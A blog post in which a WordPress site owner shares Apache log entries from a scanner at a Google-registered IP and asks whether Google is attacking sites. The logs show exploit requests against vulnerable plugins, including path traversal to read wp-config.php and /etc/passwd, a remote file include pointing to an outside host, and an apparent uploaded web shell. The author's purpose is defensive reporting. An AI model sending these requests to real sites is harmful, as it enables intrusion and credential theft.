WTF?! Is Google trying to hack WordPress sites??

Looking through the Apache access logs of one of my WordPress installations the other day, I notices these entries:

35.198.55.156 xxxxxx.xxxxxx.com - [19/Sep/2017:04:30:04 +0200] "GET /robots.txt HTTP/1.1" 200 1617 "-" "Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2623.75 Safari/537.36 OPR/36.0.2130.32"
35.198.55.156 xxxxxx.xxxxxx.com - [19/Sep/2017:04:30:04 +0200] "GET /wp-content/plugins/simple-ads-manager/js/slider/tmpl.js HTTP/1.1" 500 559 "-" "Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2623.75 Safari/537.36 OPR/36.0.2130.32"
35.198.55.156 xxxxxx.xxxxxx.com - [19/Sep/2017:04:30:05 +0200] "GET /wp-content/plugins/wp-mobile-detector/resize.php?src=http://www.zzzzzz.zzz/cache/db.php HTTP/1.1" 500 559 "-" "Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2623.75 Safari/537.36 OPR/36.0.2130.32"
35.198.55.156 xxxxxx.xxxxxx.com - [19/Sep/2017:04:30:05 +0200] "GET /wp-content/plugins/wp-mobile-detector/cache/db.php HTTP/1.1" 500 559 "-" "Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2623.75 Safari/537.36 OPR/36.0.2130.32"
35.198.55.156 xxxxxx.xxxxxx.com - [19/Sep/2017:04:30:05 +0200] "GET /wp-content/plugins/formcraft/file-upload/server/php/upload.php HTTP/1.1" 500 559 "-" "Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2623.75 Safari/537.36 OPR/36.0.2130.32"
35.198.55.156 xxxxxx.xxxxxx.com - [19/Sep/2017:04:30:07 +0200] "POST /wp-admin/admin-ajax.php HTTP/1.1" 200 1617 "-" "Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2623.75 Safari/537.36 OPR/36.0.2130.32"
35.198.55.156 xxxxxx.xxxxxx.com - [19/Sep/2017:04:30:08 +0200] "GET /wp-content/plugins/revslider/temp/update_extract/revslider/db.php HTTP/1.1" 500 559 "-" "Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2623.75 Safari/537.36 OPR/36.0.2130.32"
35.198.55.156 xxxxxx.xxxxxx.com - [19/Sep/2017:04:30:08 +0200] "GET /wp-admin/admin-ajax.php?action=revslider_show_image&img=../wp-config.php HTTP/1.1" 410 318 "-" "Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2623.75 Safari/537.36 OPR/36.0.2130.32"
35.198.55.156 xxxxxx.xxxxxx.com - [19/Sep/2017:04:30:08 +0200] "GET /wp-content/themes/mTheme-Unus/css/css.php?files=../../../../wp-config.php HTTP/1.1" 500 559 "-" "Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2623.75 Safari/537.36 OPR/36.0.2130.32"
35.198.55.156 xxxxxx.xxxxxx.com - [19/Sep/2017:04:30:08 +0200] "GET /wp-content/plugins/recent-backups/download-file.php?file_link=/etc/passwd HTTP/1.1" 500 559 "-" "Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2623.75 Safari/537.36 OPR/36.0.2130.32"
35.198.55.156 xxxxxx.xxxxxx.com - [19/Sep/2017:04:30:09 +0200] "GET /wp-content/plugins/wptf-image-gallery/lib-mbox/ajax_load.php?url=/etc/passwd HTTP/1.1" 500 559 "-" "Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2623.75 Safari/537.36 OPR/36.0.2130.32"
35.198.55.156 xxxxxx.xxxxxx.com - [19/Sep/2017:04:30:09 +0200] "GET /wp-content/plugins/./simple-image-manipulator/controller/download.php?filepath=/etc/passwd HTTP/1.1" 500 559 "-" "Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2623.75 Safari/537.36 OPR/36.0.2130.32"
35.198.55.156 xxxxxx.xxxxxx.com - [19/Sep/2017:04:30:09 +0200] "GET /wp-content/plugins/candidate-application-form/downloadpdffile.php?fileName=../../../../../../../../../../etc/passwd HTTP/1.1" 500 559 "-" "Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2623.75 Safari/537.36 OPR/36.0.2130.32"
35.198.55.156 xxxxxx.xxxxxx.com - [19/Sep/2017:04:30:09 +0200] "GET /wp-content/plugins/wp-ecommerce-shop-styling/includes/download.php?filename=../../../../../../../../../etc/passwd HTTP/1.1" 500 559 "-" "Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2623.75 Safari/537.36 OPR/36.0.2130.32"
35.198.55.156 xxxxxx.xxxxxx.com - [19/Sep/2017:04:30:11 +0200] "POST /wp-content/plugins/wp-symposium/server/php/index.php HTTP/1.1" 500 559 "-" "Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2623.75 Safari/537.36 OPR/36.0.2130.32"
35.198.55.156 xxxxxx.xxxxxx.com - [19/Sep/2017:04:30:11 +0200] "GET /wp-content/plugins/wp-symposium/server/php/TWuXPObefpOasQ.php HTTP/1.1" 500 559 "-" "Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2623.75 Safari/537.36 OPR/36.0.2130.32"

First of all: all these logged requests are coming from IP address 35.198.55.156 which is reported by Whois ARIN as belonging to Google Inc, Mountain View, USA.

Now, notice the first log entry accessing the /robots.txt which seems perfectly fine. Specially since is’s Google, right? But then again, the User-Agent is marked as “Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2623.75 Safari/537.36 OPR/36.0.2130.32” which is not any of the usual Google crawler User-Agents. Besides, it says “Windows NT 10.0” and “OPR/36.0.2130.32” (Opera 36 browser as reported by whatismybrowser.com) in there.

Triggered by the weird attempts that follow immediately in the few seconds after that first entry, trying access files and locations that do not exist, like /wp-content/plugins/simple-ads-manager/js/slider/tmpl.js, /wp-content/plugins/wp-mobile-detector/resize.php?src=http://www.zzzzzz.zzz/cache/db.php (what? trying to access a very hacky file on on another site through mine?), /wp-content/plugins/wp-symposium/server/php/TWuXPObefpOasQ.php or even /wp-content/plugins/wp-ecommerce-shop-styling/includes/download.php?filename=../../../../../../../../../etc/passwd (seriously? trying to download the server passwd file?!)… this is very disturbing.

Is Google scanning for vulnerabilities which it would then kindly announce to me when any would be found? I’ve never heard that before… Is this coming from one of their employees who came in with his/her own Window$ (obviously) laptop, unaware of the fact it has a bot running in the background? Seems unlikely to be using that specific Opera user agent… Or are they actually trying to hack my application?

I reported the incident to Google and hope — but don’t expect — to hear more from them soon!

Anybody knows what could be going on here?

Leave a Reply